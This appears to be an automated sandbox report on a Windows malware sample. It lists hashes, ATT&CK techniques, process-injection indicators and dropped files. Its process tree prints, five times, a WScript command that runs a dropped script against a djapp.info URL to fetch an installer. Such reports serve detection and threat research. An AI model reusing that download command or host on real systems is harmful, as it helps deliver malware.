84656d6694b0349e500b73aba811874ab466ad747043494377d797b7edae5856

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
04/06/2024, 00:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe
Size

184KB
MD5

9325f427cb1921de16d5338e6b7f9c55
SHA1

c20d3ba81024936e26d4a5d128d85170aba1d8b4
SHA256

84656d6694b0349e500b73aba811874ab466ad747043494377d797b7edae5856
SHA512

fdff4c9ba372be6054bf42bd9a3307431febb5f0610943303da680a204d693d4d26ba694042bd0f16f29fc8a9060a116fdfa598443c4eea819838a2dd308ec8a
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3a:/7BSH8zUB+nGESaaRvoB7FJNndnX

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2636	WScript.exe
8	2636	WScript.exe
10	2636	WScript.exe
12	2440	WScript.exe
13	2440	WScript.exe
15	2556	WScript.exe
16	2556	WScript.exe
18	1504	WScript.exe
19	1504	WScript.exe
21	2932	WScript.exe
22	2932	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1808	1860	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 2636	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2440	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2440	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2440	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2440	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2556	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2556	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2556	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2556	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	32
PID 1860 wrote to memory of 1504	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1504	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1504	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1504	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	34
PID 1860 wrote to memory of 2932	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2932	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2932	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2932	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	36
PID 1860 wrote to memory of 1808	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	38
PID 1860 wrote to memory of 1808	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	38
PID 1860 wrote to memory of 1808	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	38
PID 1860 wrote to memory of 1808	1860	9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9325f427cb1921de16d5338e6b7f9c55_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D4.js" http://www.djapp.info/?domain=YjMHoHHlIz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf6D4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2636
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D4.js" http://www.djapp.info/?domain=YjMHoHHlIz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf6D4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2440
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D4.js" http://www.djapp.info/?domain=YjMHoHHlIz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf6D4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D4.js" http://www.djapp.info/?domain=YjMHoHHlIz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf6D4.exe
  2⤵
  - Blocklisted process makes network request
  PID:1504
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6D4.js" http://www.djapp.info/?domain=YjMHoHHlIz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf6D4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2932
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 472
  2⤵
  - Program crash
  PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
aa08ec878b05196c518d4db7d55e371b

SHA1
349148372278a8cb178f3ecd9fc827797db9ed91

SHA256
7a1ba6bbe0ce1e04178103a593cf3dfd6db1c1acbac1e028544c0848c030df22

SHA512
c2ec69ee95370317b02a79758a80f43c59d896efd3f432916b3d6c9a2af39d528347dd9358950a8100115a3967a8a0d2bdd0c14e121b63798618b8dc5103b201

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
8c32fcb253673a288e339a5a712680ba

SHA1
2838058526f3974bb3d3315c64b10d124d40ed26

SHA256
95c918ec60175fca031c67a1cec4fa661532ef75929f07911a6d60a46464a295

SHA512
0f0978bdac6ed0bdb7edca46aaaa7fbd86929800075012bd5cc789109c53daad66e87b32b4db2555e2df08ad896ea759dd968a9480d9422efec7c4499ed7439c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
57dbd7b6b21a6cdc771b3ce8a54d0c3c

SHA1
e25f758576e96c4e51289dc4a39b3bca9f51ad22

SHA256
bd71127b4f318821083de08bd216508da57c49c040a78e7509c134d903327e93

SHA512
bf61e55fb1bf5b35d3c708b9a991e17c81cb3b802792d73738f739c9c7f20b8dc09e4aee54956bfbccc58bdc51c24f394bd58a13fc2b5fc7344102a0f3a8eaf8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
80f1f816baa9ad005be9390e2879d2f3

SHA1
2c6c042953c9f4cc352fd438f4c1e07ca9162da7

SHA256
532e4cedb0d7b07aa2824e3db73594abb6ea7ecd5a3a5b7d42629dec0dddf576

SHA512
3d73387dfb3351787400ca7eddbd82da03eed9da11a690bf7cd28adcf290e11845065ef1bd3c6f8885c8a660ef59ef7a9c1e5223b511e4a6c987b1b561a0fbcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
e909c5a2e54db5e8f77d7dc0e2603610

SHA1
939f7d340e21b62e98fe7525bfe1254631ac46d3

SHA256
3564e26c48009aee9a2d9ccc33ef75508175c3dbaf52c8cd6cd8aa86586df07b

SHA512
e9eec2815cdc1331ca132b244a4a77138a8b1f7d21f38cb4c9d789e7ebc2e5a827add04ae187aa1f815e00e94a74effb467eba96b58c483bc19fb3e83923bffe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
6f18ac0e3ee72d4aafe8c1354aea4c4f

SHA1
c2a95aa6e7a178c00342c7901940c71fcede1e4f

SHA256
f0abae847b24433122703986234c962d73bbcb2ec61d9eb7e1957bb306d039be

SHA512
541a3c347b408e12a933d7ea5e110f7e5073be874cb0982d630455806655e47456199971430c61c375b71aa8c03c9a46e4798baa5fa3b45a5221814e9723882a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
a0e870138e0ee9f2132e7b9950068561

SHA1
7d0d7f9f11e62c186a25bedbeb3d920b6e4dd469

SHA256
7feb719807f0caf888d3f24b0d1d7c0f8919c0b32d03180ca4f5ab71c6998d80

SHA512
a3dbf94b6219b6ce4d7b6deec3b2ca85651f347013bdc89da89b1d22877783768556234124f8b7e390f61f78cbc4e84a4201594f2e6e1973c72b8670d596309c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
d550d971dbabbe33ad10a0fcfcdc148e

SHA1
80c0b4960682ca7afe386d274f76dddf5e26642d

SHA256
f16dd100a72dad09989b29d10c4c434a21a6def40473d5e71029d67da4bdf1eb

SHA512
7597a4b4156d7fcf381f5d4140a922d269a1f4298a9d7506b15ffaf1140abd25616005341f229b4a443f3e02e2d290b2409a3ab72af67df775248fb6ed31be9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab360E.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4F88.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf6D4.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CYUBOVOA.txt

Filesize
175B

MD5
276929576f7b39420e1f04f6c63f819b

SHA1
f50ad967e9c7aebb4aba6db99a25370d20a2155f

SHA256
666d4eee52999f50f18c00bdbb72ec03fc789def2b3807d9af9ae6b94030441c

SHA512
c4aa80b2109781529e876b9c6bbfd7bd0ad41015a4555a9bc04989746cfa99e8d0254f17b38dd9d4aea3f1a45de6fdd2091651c65db25250c463b93b1b03455c

Download Submit